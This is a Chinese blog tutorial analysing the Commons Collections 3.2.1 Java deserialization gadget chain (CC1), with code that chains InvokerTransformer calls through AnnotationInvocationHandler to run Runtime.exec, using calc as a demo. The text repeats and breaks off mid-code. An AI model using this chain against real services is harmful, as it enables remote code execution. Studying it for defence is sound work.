CC链分析CC链1回到顶部环境部署dependencygroupIdcommons-collections/groupIdartifactIdcommons-collections/artifactIdversion3.2.1/version/dependency回到顶部流程分析入口org.apache.commons.collections.Transformer其中有21个实现方法我们这里找到了有重写transform方法的InvokerTransformer类并且可以看到它也继承了Serializable很符合我们的要求入口类org.apache.commons.collections.functors.InvokerTransformer,它的transform方法使用了反射来调用input的方法inputiMethodNameiParamTypesiArgs都是可控的//我们来回顾一下如何利用反射调用Runtime中的exec方法Runtime rRuntime.getRuntime();Class cr.getclass();Method mc.getMethod(exec,String.class);m.invoke(r,calc);//那么我们尝试用transform方法来调用Runtime runtime Runtime.getRuntime();InvokerTransformer exec new InvokerTransformer(exec, new Class[]{String.class}, new Object[]{calc});exec.transform(runtime);可以看到成功执行了命令那么我们就找到了源头利用点了接下来就是一步步回溯寻找合适的子类构造漏洞链直到到达重写了readObject的类寻找某个类中的某个方法调用了transform方法看到org.apache.commons.collections.map.TransformedMap下的checkSetValue//我们找到该类的构造器和checkSetValue方法protected TransformedMap(Map map, Transformer keyTransformer, Transformer valueTransformer) {//接受三个参数第一个为Map第二个和第三个就是Transformer我们需要得了可控。super(map);this.keyTransformer keyTransformer;this.valueTransformer valueTransformer;//这里是可控的}protected Object checkSetValue(Object value) {//接受一个对象类型的参数return this.valueTransformer.transform(value);//返回valueTransformer对应的transform方法那么我们这里就需要让valueTransformer为我们之前的in}但是这里有个问题可以看到构造器和方法都是proteced权限也就是说只能本类内部访问不能外部调用去实例化那么我们就需要找到内部实例化的工具这里往上查找可以找到一个public的静态方法decorate一个静态 方法这里我们就能控制参数现在调用transform方法的问题解决了返回去看checkSetValue可以看到value我们暂时不能控制全局搜索checkSetvalue看谁调用了它并且value值可受控制寻找合适的调用了checkSetValue的方法在AbstractInputCheckedMapDecorator类中发现凑巧的是它刚好是TransformedMap的父类当我们看到了setValue字样就应该想起来我们在遍历集合的时候就用过setValue和getValue所以我们只要对decorate这个map进行遍历setValue由于TransformedMap继承了AbstractInputCheckedMapDecorator类因此当调用setValue时会去父类寻找重新梳理一遍首先我们找到了TransformedMap这个类我们想要调用其中的checkSetValue方法但是这个类的构造器是protected权限只能类中访问所以我们调用decorate方法来实例化这个类在此之前我们先实例化了一个HashMap,并且调用了put方法给他赋了一个键值对然后把这个map当成参数传入实例化成了一个transformedmap对象这个对象也是Map类型的然后我们对这个对象进行遍历在遍历过程中我们可以调用setValue方法而恰好又遇到了一个重写了setValue的副类这个重写的方法刚好调用了checkSetValue方法import org.apache.commons.collections.functors.InvokerTransformer;import org.apache.commons.collections.map.TransformedMap;import java.util.HashMap;import java.util.Map;public class second {public static void main(String[] args) {Runtime r Runtime.getRuntime();InvokerTransformer invokerTransformer new InvokerTransformer(exec,new Class[]{String.class},new Object[]{calc});HashMapObject, Object map new HashMap();map.put(1,2);MapObject, Object decorate TransformedMap.decorate(map, null, invokerTransformer);for (Map.Entry entry:decorate.entrySet()){entry.setValue(r);}}}但这只是一个插曲终究不是我们所希望的readObject方法我们需要一个readObject方法来代替上述的遍历Map功能追寻setValue追踪一下setValue看是在哪调用的在AnnotationInvocationHandler中找到而且还是在重写的readObject中调用的setValueprivate void readObject(java.io.ObjectInputStream s)throws java.io.IOException, ClassNotFoundException {ObjectInputStream.GetField fields s.readFields();SuppressWarnings(unchecked)Class? extends Annotation t (Class? extends Annotation)fields.get(type, null);SuppressWarnings(unchecked)MapString, Object streamVals (MapString, Object)fields.get(memberValues, null);// Check to make sure that types have not evolved incompatiblyAnnotationType annotationType null;try {annotationType AnnotationType.getInstance(t);} catch(IllegalArgumentException e) {// Class is no longer an annotation type; time to punch outthrow new java.io.InvalidObjectException(Non-annotation type in annotation serial stream);}MapString, Class? memberTypes annotationType.memberTypes();// consistent with runtime Map typeMapString, Object mv new LinkedHashMap();// If there are annotation members without values, that// situation is handled by the invoke method.for (Map.EntryString, Object memberValue : streamVals.entrySet()) {String name memberValue.getKey();Object value null;Class? memberType memberTypes.get(name);if (memberType ! null) { // i.e. member still existsvalue memberValue.getValue();if (!(memberType.isInstance(value) ||value instanceof ExceptionProxy)) {value new AnnotationTypeMismatchExceptionProxy(objectToString(value)).setMember(annotationType.members().get(name));}}mv.put(name, value);}我们分析下这个类未用public声明说明只能通过反射调用查看一下构造方法传入一个class和Map其中class继承了Annotation也就是需要传入一个注解类进去这里我们选择Targetimport org.apache.commons.collections.functors.InvokerTransformer;import org.apache.commons.collections.map.TransformedMap;import java.lang.annotation.Target;import java.lang.reflect.Constructor;import java.lang.reflect.InvocationTargetException;import java.util.HashMap;import java.util.Map;public class third {public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException {Runtime r Runtime.getRuntime();InvokerTransformer invokerTransformer new InvokerTransformer(exec,new Class[]{String.class},new Object[]{calc});HashMapObject, Object map new HashMap();map.put(1,2);MapObject, Object decorate TransformedMap.decorate(map, null, invokerTransformer);// for (Map.Entry entry:decorate.entrySet()){// entry.setValue(r);// }Class c Class.forName(sun.reflect.annotation.AnnotationInvocationHandler);Constructor declaredConstructor c.getDeclaredConstructor(Class.class, Map.class);Object o declaredConstructor.newInstance(Target.class, decorate);}}现在有个难题是Runtime类是不能被序列化的但是反射来的类可以被序列化的还好InvokeTransformer有一个绝佳的反射机制构造一下Method RuntimeMethod (Method) new InvokerTransformer(getMethod,new Class[]{String.class,Class[].class},new Object[]{getRuntime,null}).transform(Runtime.class);Runtime r (Runtime) new InvokerTransformer(invoke, new Class[]{Object.class, Object[].class}, new Object[]{null, null}).transform(RuntimeMethod);InvokerTransformer invokerTransformer new InvokerTransformer(exec, new Class[]{String.class}, new Object[]{calc});现在还有个小问题其中我们的transformedmap是传入了一个invokertransformer但是现在这个对象没有了被拆成了多个就是上述的代码得想办法统合起来这里就需要回到最初的Transformer接口里去寻找找到ChainedTransformer刚好这个方法是递归调用数组里的transform方法我们就可以这样构造Transformer[] transformers new Transformer[]{new InvokerTransformer(getMethod,new Class[]{String.class,Class[].class},new Object[]{getRuntime,null}),new InvokerTransformer(invoke, new Class[]{Object.class, Object[].class}, new Object[]{null, null}),new InvokerTransformer(exec, new Class[]{String.class}, new Object[]{calc})};ChainedTransformer chainedTransformer new ChainedTransformer(transformers);HashMapObject, Object map new HashMap();map.put(1,2);MapObject, Object decorate TransformedMap.decorate(map, null, chainedTransformer);进一步构造import org.apache.commons.collections.functors.InvokerTransformer;import org.apache.commons.collections.map.TransformedMap;import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.ChainedTransformer;import java.io.*;import java.lang.annotation.Target;import java.lang.reflect.Constructor;import java.lang.reflect.InvocationTargetException;import java.util.HashMap;import java.util.Map;public class third {public static void serialize(Object obj) throws IOEx
【Java安全】CC链分析(CC1+CC2)
发布时间:2026/6/26 6:21:04
CC链分析CC链1回到顶部环境部署dependencygroupIdcommons-collections/groupIdartifactIdcommons-collections/artifactIdversion3.2.1/version/dependency回到顶部流程分析入口org.apache.commons.collections.Transformer其中有21个实现方法我们这里找到了有重写transform方法的InvokerTransformer类并且可以看到它也继承了Serializable很符合我们的要求入口类org.apache.commons.collections.functors.InvokerTransformer,它的transform方法使用了反射来调用input的方法inputiMethodNameiParamTypesiArgs都是可控的//我们来回顾一下如何利用反射调用Runtime中的exec方法Runtime rRuntime.getRuntime();Class cr.getclass();Method mc.getMethod(exec,String.class);m.invoke(r,calc);//那么我们尝试用transform方法来调用Runtime runtime Runtime.getRuntime();InvokerTransformer exec new InvokerTransformer(exec, new Class[]{String.class}, new Object[]{calc});exec.transform(runtime);可以看到成功执行了命令那么我们就找到了源头利用点了接下来就是一步步回溯寻找合适的子类构造漏洞链直到到达重写了readObject的类寻找某个类中的某个方法调用了transform方法看到org.apache.commons.collections.map.TransformedMap下的checkSetValue//我们找到该类的构造器和checkSetValue方法protected TransformedMap(Map map, Transformer keyTransformer, Transformer valueTransformer) {//接受三个参数第一个为Map第二个和第三个就是Transformer我们需要得了可控。super(map);this.keyTransformer keyTransformer;this.valueTransformer valueTransformer;//这里是可控的}protected Object checkSetValue(Object value) {//接受一个对象类型的参数return this.valueTransformer.transform(value);//返回valueTransformer对应的transform方法那么我们这里就需要让valueTransformer为我们之前的in}但是这里有个问题可以看到构造器和方法都是proteced权限也就是说只能本类内部访问不能外部调用去实例化那么我们就需要找到内部实例化的工具这里往上查找可以找到一个public的静态方法decorate一个静态 方法这里我们就能控制参数现在调用transform方法的问题解决了返回去看checkSetValue可以看到value我们暂时不能控制全局搜索checkSetvalue看谁调用了它并且value值可受控制寻找合适的调用了checkSetValue的方法在AbstractInputCheckedMapDecorator类中发现凑巧的是它刚好是TransformedMap的父类当我们看到了setValue字样就应该想起来我们在遍历集合的时候就用过setValue和getValue所以我们只要对decorate这个map进行遍历setValue由于TransformedMap继承了AbstractInputCheckedMapDecorator类因此当调用setValue时会去父类寻找重新梳理一遍首先我们找到了TransformedMap这个类我们想要调用其中的checkSetValue方法但是这个类的构造器是protected权限只能类中访问所以我们调用decorate方法来实例化这个类在此之前我们先实例化了一个HashMap,并且调用了put方法给他赋了一个键值对然后把这个map当成参数传入实例化成了一个transformedmap对象这个对象也是Map类型的然后我们对这个对象进行遍历在遍历过程中我们可以调用setValue方法而恰好又遇到了一个重写了setValue的副类这个重写的方法刚好调用了checkSetValue方法import org.apache.commons.collections.functors.InvokerTransformer;import org.apache.commons.collections.map.TransformedMap;import java.util.HashMap;import java.util.Map;public class second {public static void main(String[] args) {Runtime r Runtime.getRuntime();InvokerTransformer invokerTransformer new InvokerTransformer(exec,new Class[]{String.class},new Object[]{calc});HashMapObject, Object map new HashMap();map.put(1,2);MapObject, Object decorate TransformedMap.decorate(map, null, invokerTransformer);for (Map.Entry entry:decorate.entrySet()){entry.setValue(r);}}}但这只是一个插曲终究不是我们所希望的readObject方法我们需要一个readObject方法来代替上述的遍历Map功能追寻setValue追踪一下setValue看是在哪调用的在AnnotationInvocationHandler中找到而且还是在重写的readObject中调用的setValueprivate void readObject(java.io.ObjectInputStream s)throws java.io.IOException, ClassNotFoundException {ObjectInputStream.GetField fields s.readFields();SuppressWarnings(unchecked)Class? extends Annotation t (Class? extends Annotation)fields.get(type, null);SuppressWarnings(unchecked)MapString, Object streamVals (MapString, Object)fields.get(memberValues, null);// Check to make sure that types have not evolved incompatiblyAnnotationType annotationType null;try {annotationType AnnotationType.getInstance(t);} catch(IllegalArgumentException e) {// Class is no longer an annotation type; time to punch outthrow new java.io.InvalidObjectException(Non-annotation type in annotation serial stream);}MapString, Class? memberTypes annotationType.memberTypes();// consistent with runtime Map typeMapString, Object mv new LinkedHashMap();// If there are annotation members without values, that// situation is handled by the invoke method.for (Map.EntryString, Object memberValue : streamVals.entrySet()) {String name memberValue.getKey();Object value null;Class? memberType memberTypes.get(name);if (memberType ! null) { // i.e. member still existsvalue memberValue.getValue();if (!(memberType.isInstance(value) ||value instanceof ExceptionProxy)) {value new AnnotationTypeMismatchExceptionProxy(objectToString(value)).setMember(annotationType.members().get(name));}}mv.put(name, value);}我们分析下这个类未用public声明说明只能通过反射调用查看一下构造方法传入一个class和Map其中class继承了Annotation也就是需要传入一个注解类进去这里我们选择Targetimport org.apache.commons.collections.functors.InvokerTransformer;import org.apache.commons.collections.map.TransformedMap;import java.lang.annotation.Target;import java.lang.reflect.Constructor;import java.lang.reflect.InvocationTargetException;import java.util.HashMap;import java.util.Map;public class third {public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException {Runtime r Runtime.getRuntime();InvokerTransformer invokerTransformer new InvokerTransformer(exec,new Class[]{String.class},new Object[]{calc});HashMapObject, Object map new HashMap();map.put(1,2);MapObject, Object decorate TransformedMap.decorate(map, null, invokerTransformer);// for (Map.Entry entry:decorate.entrySet()){// entry.setValue(r);// }Class c Class.forName(sun.reflect.annotation.AnnotationInvocationHandler);Constructor declaredConstructor c.getDeclaredConstructor(Class.class, Map.class);Object o declaredConstructor.newInstance(Target.class, decorate);}}现在有个难题是Runtime类是不能被序列化的但是反射来的类可以被序列化的还好InvokeTransformer有一个绝佳的反射机制构造一下Method RuntimeMethod (Method) new InvokerTransformer(getMethod,new Class[]{String.class,Class[].class},new Object[]{getRuntime,null}).transform(Runtime.class);Runtime r (Runtime) new InvokerTransformer(invoke, new Class[]{Object.class, Object[].class}, new Object[]{null, null}).transform(RuntimeMethod);InvokerTransformer invokerTransformer new InvokerTransformer(exec, new Class[]{String.class}, new Object[]{calc});现在还有个小问题其中我们的transformedmap是传入了一个invokertransformer但是现在这个对象没有了被拆成了多个就是上述的代码得想办法统合起来这里就需要回到最初的Transformer接口里去寻找找到ChainedTransformer刚好这个方法是递归调用数组里的transform方法我们就可以这样构造Transformer[] transformers new Transformer[]{new InvokerTransformer(getMethod,new Class[]{String.class,Class[].class},new Object[]{getRuntime,null}),new InvokerTransformer(invoke, new Class[]{Object.class, Object[].class}, new Object[]{null, null}),new InvokerTransformer(exec, new Class[]{String.class}, new Object[]{calc})};ChainedTransformer chainedTransformer new ChainedTransformer(transformers);HashMapObject, Object map new HashMap();map.put(1,2);MapObject, Object decorate TransformedMap.decorate(map, null, chainedTransformer);进一步构造import org.apache.commons.collections.functors.InvokerTransformer;import org.apache.commons.collections.map.TransformedMap;import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.ChainedTransformer;import java.io.*;import java.lang.annotation.Target;import java.lang.reflect.Constructor;import java.lang.reflect.InvocationTargetException;import java.util.HashMap;import java.util.Map;public class third {public static void serialize(Object obj) throws IOEx
相关文章
Bushound USB协议分析工具:从原理到实战的深度解析
1. 项目概述:为什么我们需要Bushound这样的“USB侦探”?在嵌入式开发、硬件调试或者逆向工程领域,我们经常要和USB设备打交道。你可能遇到过这样的场景:你写了一段代码去控制一个USB设备,但设备毫无反应;或…
计算机毕业设计之jsp基于SSM的校园社团管理系统的设计与实现
随着互联网的快速发展,信息技术使各行业日益繁荣。本文探讨了基于SSM的校园社团管理系统的设计与实现。该网站旨在为用户提供了一个更便捷、高效的平台,通过简洁明了的界面设计和流畅的用户体验,吸引更多用户。文章首先分析了市场需求和技术选…
广东活动策划公司哪家更值得信赖
在广东地区,选择一家值得信赖的活动策划公司对于企业来说至关重要。本次推荐的几家活动策划公司,在广东汽车活动策划领域表现突出,旨在为企业提供多元化的选择参考。一、广州威帅营销策划有限公司 介绍:广州威帅营销策划有限公司&…
FIFA 23生涯模式终极改造指南:免费开源修改器完全手册
FIFA 23生涯模式终极改造指南:免费开源修改器完全手册 【免费下载链接】FIFA-23-Live-Editor FIFA 23 Live Editor 项目地址: https://gitcode.com/gh_mirrors/fi/FIFA-23-Live-Editor 还在为FIFA 23生涯模式中球员成长缓慢而苦恼?想要打造自己的…
后端开发中的测试策略:确保代码质量的有效方法
在当今快速迭代的软件开发环境中,后端开发作为系统的核心,其稳定性、可维护性和可扩展性直接决定了整个应用的成败。随着系统复杂度的提升,确保后端代码质量成为开发团队不可忽视的挑战。测试作为保障质量的关键手段,其策略的制定…
球迷必装!NAS部署2026世界杯开源伴侣,比分/赛程/预测一站搞定
球迷必装!NAS部署2026世界杯开源伴侣,比分/赛程/预测一站搞定哈喽小伙伴们好,我是Stark-C~2026世界杯正如火如荼进行,比赛是一场接一场,我身边已经有人为了看自己喜欢的球队,直接请假熬夜看球的。我个人算不…
Javascript闭包的理解
有点像Java中的内部类。内部类持有外部类引用function outer() {var outerVar "outer";return function inner() {console.log(outerVar);} } var o outer(); o();为了深入理解闭包,下面是一个复杂的例子function fun(argA, argB) {console.log(argB);r…
Scaling Up 的工程优化
一、样本存储格式:TFRecord → ORCTFRecord 是 TensorFlow 原生的二进制序列化格式,本质上是 Protocol Buffer 的封装,每条样本顺序存储,不支持列式访问,也没有内置压缩。ORC(Optimized Row Columnar&#…
Claude语义压缩层蒸发:中间态消失后的工程应对指南
1. 项目概述:这不是一次普通更新,而是一次架构级“蒸发”“Anthropic Just Shipped the Layer That’s Already Going to Zero”——这个标题一出现,我在 Slack 群里就看到三位同行同时发了同一个表情:一个倒计时归零的数字“0”。…
Qwen2.5-Turbo百万上下文实战指南:百炼平台长文本处理全解析
1. 项目概述:这不是一次普通模型更新,而是一次上下文能力的质变跃迁“Qwen2.5-Turbo上线阿里云百炼平台,模型上下文长度扩展至百万tokens”——这句话里藏着三个关键信号:Turbo不是简单提速,而是面向生产环境的工程化重…
Kotlin的@JvmStatic与@JvmField:与Java互操作的注解
Kotlin作为一门现代编程语言,与Java的互操作性一直是其核心优势之一。为了让Kotlin代码能够无缝对接Java,Kotlin提供了多种注解来优化互操作体验,其中JvmStatic和JvmField是两个关键注解。它们分别用于解决静态成员和字段在Java中的访问问题&…
AI 驱动下 GEO 与 SEO 融合实战指南
摘要:本文深入探讨了从传统SEO到生成式搜索(GEO)的范式转移,为技术内容创作者揭示了新搜索生态下的挑战与机遇。面对大模型直接生成答案的趋势,单纯的关键词排名已不足以保证流量。文章系统性地提出了三大核心策略&…
Google AI Studio 300美元额度的真相与实战指南
1. 这300美金不是“送钱”,而是Google埋下的第一道技术门槛 你看到标题里那个醒目的“$300美金”时,第一反应可能是:又一个免费额度?领完就完事?我亲手试过——这300美金根本不是红包,而是一张入场券&…
PDF对比终极指南:用diff-pdf轻松识别文档差异的完整教程
PDF对比终极指南:用diff-pdf轻松识别文档差异的完整教程 【免费下载链接】diff-pdf A simple tool for visually comparing two PDF files 项目地址: https://gitcode.com/gh_mirrors/di/diff-pdf 还在为PDF文档的版本对比而烦恼吗?diff-pdf这款开…
嵌入式GUI控件实战:ROTARY、SCROLLBAR、SLIDER原理与应用
1. 嵌入式GUI控件:从原理到实战的深度解析在嵌入式系统开发中,图形用户界面(GUI)的设计与实现往往是项目从“能用”到“好用”的关键一跃。不同于资源充沛的PC或移动平台,嵌入式设备的GUI需要在有限的CPU性能、内存空间…
Zotero Duplicates Merger:5步彻底清理文献库重复条目
Zotero Duplicates Merger:5步彻底清理文献库重复条目 【免费下载链接】ZoteroDuplicatesMerger A zotero plugin to automatically merge duplicate items 项目地址: https://gitcode.com/gh_mirrors/zo/ZoteroDuplicatesMerger 还在为文献库中堆积如山的重…
利用随机有限集理论对蜂群的ILQR和MPC控制研究附Matlab代码
✅作者简介:热爱科研的Matlab仿真开发者,擅长数据处理、建模仿真、程序设计、完整代码获取、论文复现及科研仿真。🍎 往期回顾关注个人主页:Matlab科研工作室🍊个人信条:格物致知,完整Matlab代码及仿真咨询…
为什么你的Gemini邮件CTE低于行业均值2.8倍?:从Prompt架构到发送时序的深度归因
更多请点击: https://intelliparadigm.com 第一章:为什么你的Gemini邮件CTE低于行业均值2.8倍?:从Prompt架构到发送时序的深度归因 Gemini邮件的客户转化效率(CTE)显著偏低,根本原因常被误判为…